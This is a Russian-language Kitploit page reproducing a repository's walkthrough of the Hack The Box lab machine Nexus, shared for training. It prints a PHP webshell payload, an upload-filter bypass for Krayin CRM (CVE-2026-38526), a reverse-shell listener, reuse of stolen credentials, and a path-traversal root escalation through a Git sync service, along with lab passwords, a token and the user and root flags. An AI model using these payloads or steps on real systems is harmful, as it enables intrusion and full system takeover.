Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
htb-labs-nexus — # Разбор машины Hack The Box Nexus: разведка, обнаружение учётных данных Gitea, эксплуатация Krayin CRM через CVE-2026-38526, получение начального доступа и повышение привилегий через уязвимый сервис синхронизации шаблонов Gitea. | Kitploit
Инструменты/GitHubGitHub/diegorivas1/htb-labs-nexus
Повышение привилегийРазведкаАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьCTFТестирование на ПроникновениеОбучение и Образование

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Лаборатории и Практика
GitHubdiegorivas1/htb-labs-nexus

htb-labs-nexus

# Разбор машины Hack The Box Nexus: разведка, обнаружение учётных данных Gitea, эксплуатация Krayin CRM через CVE-2026-38526, получение начального доступа и повышение привилегий через уязвимый сервис синхронизации шаблонов Gitea.

Репозиторий
8 ч 2 мин назадЕщё не проверено

🏴‍☠️ HTB Labs - Nexus

English 🇺🇸 | Español 🇪🇸

English | Español

HTB Difficulty OS Platform


📋 Обзор

Nexus — это Linux-машина лёгкого уровня сложности с платформы Hack The Box, демонстрирующая многоэтапную цепочку атак, включающую перечисление виртуальных хостов, раскрытые учётные данные, уязвимый функционал веб-приложения, удалённое выполнение кода, повторное использование учётных данных и локальное повышение привилегий.

Цепочка атак

root@kitploit:~
Разведка
      │
      ▼
Перечисление виртуальных хостов
      │
      ├── git.nexus.htb
      └── billing.nexus.htb
              │
              ▼
      История коммитов Gitea
              │
              ▼
       Раскрытые учётные данные
              │
              ▼
        Вход в Krayin CRM
              │
              ▼
      CVE-2026-38526
              │
              ▼
        PHP-вебшелл
              │
              ▼
       Обратная оболочка
        (www-data)
              │
              ▼
       Файл .env приложения
              │
              ▼
        SSH как jones
              │
              ▼
   gitea-template-sync
              │
              ▼
       Обход пути
              │
              ▼
    Вредоносный Git-репозиторий
              │
              ▼
         SSH как root

Ключевые техники

  • 🔍 Перечисление виртуальных хостов
  • 🔑 Обнаружение учётных данных через историю Git-коммитов
  • 💻 Эксплуатация Krayin CRM
  • 🐚 PHP-вебшелл и обратная оболочка
  • 🔐 Повторное использование учётных данных
  • 🔬 Перечисление служб Linux
  • 📂 Обход пути
  • 🌳 Создание вредоносного Git-репозитория
  • 👑 Повышение привилегий до root

Целевой IP: 10.129.82.92


🔍 Фаза 1: Разведка

Сканирование портов

root@kitploit:~
nmap -p- -sV -sC -oN nexus_full_scan.txt 10.129.82.92

Результаты

root@kitploit:~
22/tcp  open  ssh   OpenSSH 9.6p1 Ubuntu
80/tcp  open  http  nginx 1.24.0 (Ubuntu)

Перечисление виртуальных хостов

root@kitploit:~
gobuster vhost \
-u http://nexus.htb \
-w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
--append-domain

Обнаруженные хосты

root@kitploit:~
git.nexus.htb       → Gitea
billing.nexus.htb   → Krayin CRM

Добавьте обнаруженные хосты в /etc/hosts:

root@kitploit:~
echo "10.129.82.92 nexus.htb git.nexus.htb billing.nexus.htb" | sudo tee -a /etc/hosts

🔑 Фаза 2: Обнаружение учётных данных

Перечисление Gitea

Перейдите по адресу:

root@kitploit:~
http://git.nexus.htb

Репозиторий с именем:

root@kitploit:~
admin/krayin-docker-setup

содержит полезную информацию в своей Git-истории.

Файл .env можно восстановить из предыдущих коммитов, что раскрывает учётные данные, которые больше не присутствуют в текущей версии.

Обнаруженные учётные данные

СервисИмя пользователяПароль
Krayin CRM[email protected]N27xh!!2ucY04
GiteajonesN27xh!!2ucY04

Адрес электронной почты [email protected] также был обнаружен в разделе о сотрудниках на основном сайте.


💻 Фаза 3: CVE-2026-38526 : Krayin CRM

Вход в CRM

root@kitploit:~
URL: http://billing.nexus.htb/admin/login

Email: [email protected]
Password: N27xh!!2ucY04

Загрузка вебшелла

Перейдите по адресу:

root@kitploit:~
/admin/mail/sent

Затем:

  1. Нажмите Compose Mail.
  2. Прикрепите PHP-пейлоад.
  3. Перехватите запрос с помощью Burp Suite.
  4. Измените имя загружаемого файла.
  5. Измените MIME-тип.
  6. Перешлите запрос.

Пейлоад хранится в:

root@kitploit:~
exploits/CVE-2026-38526/shell.php

Пейлоад:

root@kitploit:~
<?php system($_GET["cmd"]); ?>

Соответствующие multipart-поля:

root@kitploit:~
Content-Disposition: form-data; name="attachments[]"; filename="shell.php"
Content-Type: application/x-php

Вебшелл

После успешной загрузки:

root@kitploit:~
http://billing.nexus.htb/storage/emails/2/shell.php?cmd=id

Ожидаемый результат:

root@kitploit:~
uid=33(www-data) gid=33(www-data) groups=33(www-data)

📡 Фаза 4: Обратная оболочка

Запустите слушатель:

root@kitploit:~
nc -lvnp 4444

Затем запустите обратную оболочку через загруженный вебшелл.

Реализация на Python доступна по адресу:

root@kitploit:~
exploits/CVE-2026-38526/reverse_shell.py

На этом этапе оболочка получена как:

root@kitploit:~
www-data

🐚 Фаза 5: Доступ пользователя

Чтение конфигурации приложения

Проверьте конфигурацию Krayin:

root@kitploit:~
cat /var/www/krayin/.env

Обнаружены учётные данные:

root@kitploit:~
DB_USERNAME=krayin
DB_PASSWORD=y27xb3ha!!74GbR

Перечисление пользователей

root@kitploit:~
cat /etc/passwd | grep sh$

Обнаружена учётная запись jones.

SSH как jones

root@kitploit:~
ssh [email protected]

Пароль:

root@kitploit:~
y27xb3ha!!74GbR

Флаг пользователя

root@kitploit:~
f20cbf9aeb6bb228d356a42ff49c1933

🔬 Фаза 6: Повышение привилегий

Перечисление служб

root@kitploit:~
systemctl list-units | grep -i gitea

Обнаружены следующие служба и таймер:

root@kitploit:~
gitea-template-sync.timer
gitea-template-sync.service

Служба выполняется с повышенными привилегиями.

Уязвимый скрипт

root@kitploit:~
/etc/gitea/template-sync.py

Механизм синхронизации использует конструкцию путей, которую можно эксплуатировать через обход пути.


🎯 Фаза 7: Вредоносный Git-репозиторий

Сгенерируйте пару SSH-ключей:

root@kitploit:~
ssh-keygen -t ed25519 -f /tmp/nexus_root -N ""
cat /tmp/nexus_root.pub

Эксплойт для манипуляции Git-объектами находится по адресу:

root@kitploit:~
exploits/gitea_template_sync/exploit_git.py

Создайте репозиторий:

root@kitploit:~
cd /tmp
rm -rf exploit
mkdir exploit
cd exploit

git init
python3 exploit_git.py

Репозиторий должен использовать ветку:

root@kitploit:~
main

Токен Gitea

Сгенерируйте персональный токен доступа через:

root@kitploit:~
http://git.nexus.htb

Перейдите по адресу:

root@kitploit:~
Settings → Applications

Затем настройте удалённый репозиторий:

root@kitploit:~
git remote set-url origin http://jones:[email protected]/jones/exploit.git

Отправьте вредоносный репозиторий:

root@kitploit:~
git push -f origin main

⏰ Фаза 8: Синхронизация шаблонов

Отслеживайте журнал синхронизации:

root@kitploit:~
tail -f /var/log/template-sync.log

Успешная синхронизация приводит к обработке вредоносного Git-дерева привилегированной службой.

Пример:

root@kitploit:~
[2026-08-27 02:01:30] Syncing template: jones/exploit
[2026-08-27 02:01:30]   synced: ../../../../../root/.ssh/authorized_keys
[2026-08-27 02:01:30] Template sync complete

👑 Фаза 9: Root

После записи открытого SSH-ключа в учётную запись root:

root@kitploit:~
ssh -i /tmp/nexus_root [email protected]

Проверьте доступ:

root@kitploit:~
whoami

Ожидаемый результат:

root@kitploit:~
root

Получите root-флаг:

root@kitploit:~
cat /root/root.txt

Root-флаг

root@kitploit:~
85be1d2a3084e387da0e7dd118908c63

🏆 Флаги

ФлагЗначение
Userf20cbf9aeb6bb228d356a42ff49c1933
Root85be1d2a3084e387da0e7dd118908c63

🔐 Учётные данные

Эти учётные данные принадлежат лабораторной среде Hack The Box, задокументированной в этом репозитории.


🛠️ Инструменты


📁 Структура репозитория

root@kitploit:~
htb-labs-nexus/
├── README.md
├── exploits/
│   ├── CVE-2026-38526/
│   │   ├── shell.php
│   │   ├── reverse_shell.py
│   │   └── burp_request.txt
│   └── gitea_template_sync/
│       ├── exploit_git.py
│       ├── create_repo.sh
│       └── key.pub
├── scripts/
│   ├── linpeas.sh
│   ├── LinEnum.sh
│   └── enum_services.sh
├── assets/
│   ├── nmap_scan.txt
│   ├── gobuster_vhost.txt
│   └── credentials.txt
├── screenshots/
│   ├── gitea_repo.png
│   ├── crm_login.png
│   ├── webshell.png
│   └── root_flag.png
└── notes/
    ├── methodology.md
    ├── commands.md
    └── credentials.md

📚 Дополнительные ресурсы

  • CVE-2026-38526
  • Krayin CRM
  • Документация Gitea
  • OWASP Path Traversal

⚠️ Отказ от ответственности

Этот репозиторий предназначен только для образовательных целей и авторизованного тестирования безопасности.

Техники, учётные данные, эксплойты и команды, задокументированные здесь, не должны использоваться против систем без явного разрешения.


🎯 Ключевые выводы

  1. 🔍 Перечисляйте виртуальные хосты: важные службы могут быть скрыты за поддоменами.
  2. 🔑 Просматривайте Git-историю: удаление секрета из файла не означает, что он исчез из истории репозитория.
  3. 💻 Анализируйте загрузку файлов: проверка расширений и MIME-типов может быть критически важным механизмом безопасности.
  4. 🐚 Перечисляйте после получения оболочки: файлы конфигурации могут содержать повторно используемые учётные данные.
  5. 🔬 Проверяйте привилегированные службы: служба, работающая как root, может стать вектором повышения привилегий.
  6. 📂 Правильно проверяйте пути к файлам: небезопасная обработка путей, контролируемых пользователем, может привести к уязвимостям обхода пути.
  7. 🌳 Git может стать вектором атаки: объектами и деревьями Git можно манипулировать, если приложение некорректно доверяет их структуре.

🙏 Благодарности

  • Hack The Box : Машина и лабораторная платформа
  • P3lured : Оригинальный разбор
  • Tran Manh Tan : Дополнительное руководство

⭐ Если этот разбор оказался полезным, поставьте звёздочку репозиторию.

Скачать инструмент
СервисИмя пользователяПароль / Ключ
Krayin CRM[email protected]N27xh!!2ucY04
GiteajonesN27xh!!2ucY04
Токен Giteajones1dd7105bf7e57cad02c5a56af5d92703a7839364
SSHjonesy27xb3ha!!74GbR
SSH Rootroot/tmp/nexus_root
ИнструментНазначение
NmapПеречисление портов и служб
GobusterПеречисление виртуальных хостов
Burp SuiteПерехват и модификация HTTP-запросов
GitАнализ репозиториев и создание вредоносных репозиториев
Python 3Скрипты эксплуатации
NetcatСлушатель обратной оболочки
LinEnumПеречисление Linux
LinPEASПеречисление для повышения привилегий
SSHУдалённый доступ